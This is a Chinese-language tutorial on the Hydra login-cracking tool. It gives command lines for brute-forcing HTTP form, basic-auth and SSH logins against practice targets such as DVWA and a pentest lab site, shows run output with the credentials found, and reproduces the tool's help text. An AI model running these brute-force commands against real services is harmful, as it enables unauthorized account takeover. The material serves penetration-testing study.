简介
hydra 是一个网络帐号破解工具,支持多种协议。其作者是van Hauser,David Maciejak与其共同维护.
hydra在所有支持GCC的平台能很好的编译,包括Linux,所有版本的BSD,Mac OS, Solaris等.
支持的协议:
Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET,
HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET,
HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC,
LDAP, MEMCACHED, MONGODB, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID,
Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, Radmin, RDP, Rexec, Rlogin, Rsh, RTSP,
SAP/R3, SIP,SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY,
Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
github: hydra
例1. GET 方式
hydra 使用的具体参数文本如下:
hydra -V -l admin -o log -P darkweb2017-top10000.txt 127.0.0.1 http-get-form
"/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username
and/or password incorrect.:H=Cookie: security=low; PHPSESSID=llfvb69s8cv57g5c14sfrtr81c"
参数解析:(参数解析后贴一张hydra详细的操作表)
-V详细模式,显示登录每次尝试的信息-l指定特定的用户名(即已经知道了用户名),这里已经知道用户名是 admin-o将信息输出到指定的文件,这里是log文件,(不指定也行)-
-P(大写 P)指定暴力破解的密码的文件来源,这里是从密码文件即字典 darkweb2017-top10000.txt 里面查找密码(所以好的字典很重要, 爆破字典 SecLists) 127.0.0.1IP 地址http-get-form使用的是 http 的GET方式, 使用什么方式具体要看登录的程序使用的什么方式, 比如远程登录使用的是 ssh,
那么怎么指定 是GET方式还是POST方式呢?可以用Burpsuite截获一条登录信息来查看./DVWA/vulnerabilities/brute/具体的目录:用冒号 “:” 来分割信息username=^USER^&password=^PASS^&Login=Login信息填写用 burpsuite 截获得到Username and/or password incorrect这个是登录失败的提示, 可以写成F=Username and/or password incorrectH=Cookie: security=low; PHPSESSID=llfvb69s8cv57g5c14sfrtr81c这里的 H 应该代表的是头部信息
列2. POST 方式
hydra -L names.txt -p a 35.227.24.107 http-post-form "/4229312c64/login:username=^USER^&password=^PASS^
:F=Invalid username:H=Cookie: session=eyJjYXJ0IjpbXX0.ELcBLw.ZnoGnldeUdY-gST8OKErk_lkbs8"
-L指定的枚举用户名的文件来源, 例1-l指定用户名为admin,是在已知用户名的情况下才用-l-p(小写的 p)指定密码为a
其他参数例1已说明.
例3. hydra暴力破解HTTP身份验证
POST方式
hydra -L users.txt -P pass.txt http-post://pentesteracademylab.appspot.com/lab/webapp/basicauth
另外一种书写格式
hydra -L users.txt -P pass.txt pentesteracademylab.appspot.com http-post "/lab/webapp/basicauth"
结果
[root@ideal-cluster-2 ~]# hydra -L users.txt -P pass.txt http-post://pentesteracademylab.appspot.com/lab/webapp/basicauth
Hydra v9.1-dev (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-01-29 01:55:19
[DATA] max 12 tasks per 1 server, overall 12 tasks, 12 login tries (l:3/p:4), ~1 try per task
[DATA] attacking http-post://pentesteracademylab.appspot.com:80/lab/webapp/basicauth
[80][http-post] host: pentesteracademylab.appspot.com login: admin password: aaddd
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-01-29 01:55:19
GET方式
虽然 pentesteracademylab.appspot.com 域名用的是POST方式,但是如果其他网站域名用的是GET方式时例子如下:
hydra -L users.txt -P pass.txt http-get://pentesteracademylab.appspot.com/lab/webapp/basicauth
或
hydra -L users.txt -P pass.txt pentesteracademylab.appspot.com http-get "/lab/webapp/basicauth"
需要写HTTP Header 信息例子: 80端口:
hydra -L /root/SecLists/Usernames/Names/names.txt
-P /root/SecLists/Passwords/darkweb2017-top10000.txt
"http-get://www.target.com:80/:A=BASIC:F=Unauthorized"
或
443端口:
hydra -L /root/SecLists/Usernames/Names/names.txt
-P /root/SecLists/Passwords/darkweb2017-top10000.txt
"http-get://www.target.com:443/:A=BASIC:F=Unauthorized"
参数解释请输入命令:
hydra -U http-get
查看
列4. SSH
hydra -v -I -l root -P SecLists/Passwords/darkweb2017-top1000.txt -t 4 -w 100 ssh://192.168.1.128:22/
参数说明:
-v详细模式(打印出详细的信息)-I跳过开头10秒钟的等待,直接开始.(为了防止覆盖上一次会话内容,hydra会在开始的时候等待10秒钟)-l指定用户名-P指定要尝试的密码的文件.-t指定线程数-w设定超时时间,单位秒
出现很多有效的用户名和密码对的可能原因
比如:
[root@ideal-cluster-2 ~]# hydra -L users.txt -P pass.txt http-get://pentesteracademylab.appspot.com/lab/webapp/basicauth
Hydra v9.1-dev (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-01-29 01:51:23
[DATA] max 12 tasks per 1 server, overall 12 tasks, 12 login tries (l:3/p:4), ~1 try per task
[DATA] attacking http-get://pentesteracademylab.appspot.com:80/lab/webapp/basicauth
[80][http-get] host: pentesteracademylab.appspot.com login: admin password: aaddd
[80][http-get] host: pentesteracademylab.appspot.com password: asddd
[80][http-get] host: pentesteracademylab.appspot.com password: ssdaa
[80][http-get] host: pentesteracademylab.appspot.com login: nick password: asddd
[80][http-get] host: pentesteracademylab.appspot.com login: nick password: aassd
[80][http-get] host: pentesteracademylab.appspot.com login: admin password: aassd
[80][http-get] host: pentesteracademylab.appspot.com login: admin password: ssdaa
[80][http-get] host: pentesteracademylab.appspot.com login: admin password: asddd
[80][http-get] host: pentesteracademylab.appspot.com login: nick password: ssdaa
[80][http-get] host: pentesteracademylab.appspot.com password: aassd
[80][http-get] host: pentesteracademylab.appspot.com password: aaddd
[80][http-get] host: pentesteracademylab.appspot.com login: nick password: aaddd
1 of 1 target successfully completed, 12 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-01-29 01:51:23
可能是:
- 没有设置Header 头部的Cookie
- 使用的HTTP的方式错误比如网站用的是POST方式,但是hydra却用http-get请求
- 填写的端口不正确比如 填的是
80但是用的确是443
hydra的http-get 可用添加头部了,Optionally add request headers to http-get #342
hydra 使用手册详解
终端输入
hydra -h
便可查看
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]
Options:
-R restore a previous aborted/crashed session
-I ignore an existing restore file (don't wait 10 seconds)
-S perform an SSL connect
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help
-y disable use of symbols in bruteforce, see above
-e nsr try "n" null password, "s" login as pass and/or "r" reversed login
-u loop around users, not passwords (effective! implied with -x)
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to attack, one entry per line, ':' to specify port
-o FILE write found login/password pairs to FILE instead of stdout
-b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
-f / -F exit when a login/pass pair is found (-M: -f per host, -F global)
-t TASKS run TASKS number of connects in parallel per target (default: 16)
-T TASKS run TASKS connects in parallel overall (for -M, default: 64)
-w / -W TIME wait time for a response (32) / between connects per thread (0)
-c TIME wait time per login attempt over all threads (enforces -t 1)
-4 / -6 use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
-v / -V / -d verbose mode / show login+pass for each attempt / debug mode
-O use old SSL v2 and v3
-q do not print messages about connection errors
-U 服务模块使用明细
-h more command line options (COMPLETE HELP)
server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)
Supported services: adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at https://github.com/vanhauser-thc/thc-hydra
Don't use in military or secret service organizations, or for illegal purposes.
These services were not compiled in: afp ncp oracle sapr3.
Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
E.g. % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4:// connect://)
% export HYDRA_PROXY=connect_and_socks_proxylist.txt (up to 64 entries)
% export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080
% export HYDRA_PROXY_HTTP=proxylist.txt (up to 64 entries)
Examples:
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh
-U 服务模块使用明细
终端输入
hydra -U http-get
hydra -U http-get-form
hydra -U http-post
hydra -U http-post-form
比如 http-get
Help for module http-get:
============================================================================
Module http-get requires the page to authenticate.
The following parameters are optional:
(a|A)=auth-type specify authentication mechanism to use: BASIC, NTLM or MD5
(h|H)=My-Hdr\: foo to send a user defined HTTP header with each request
(F|S)=check for text in the HTTP reply. S= means if this text is found, a
valid account has been found, F= means if this string is present the
combination is invalid. Note: this must be the last option supplied.
For example: "/secret" or "http://bla.com/foo/bar:H=Cookie\: sessid=aaaa" or "https://test.com:8080/members:A=NTLM"
说明:
(a|A)=auth-type指定要使用的身份验证机制:BASIC、NTLM或MD5,例如A=BASIC(h|H)=My-Hdr\: foo每个请求都发送一个用户定义的HTTP头(F|S)=check for text in the HTTP reply.(检查HTTP应答中的文本)
S=表示如果找到该文本,则表示找到了一个有效的帐户
F=表示如果该字符串存在,则该组合无效;注意:这必须是最后提供的选项
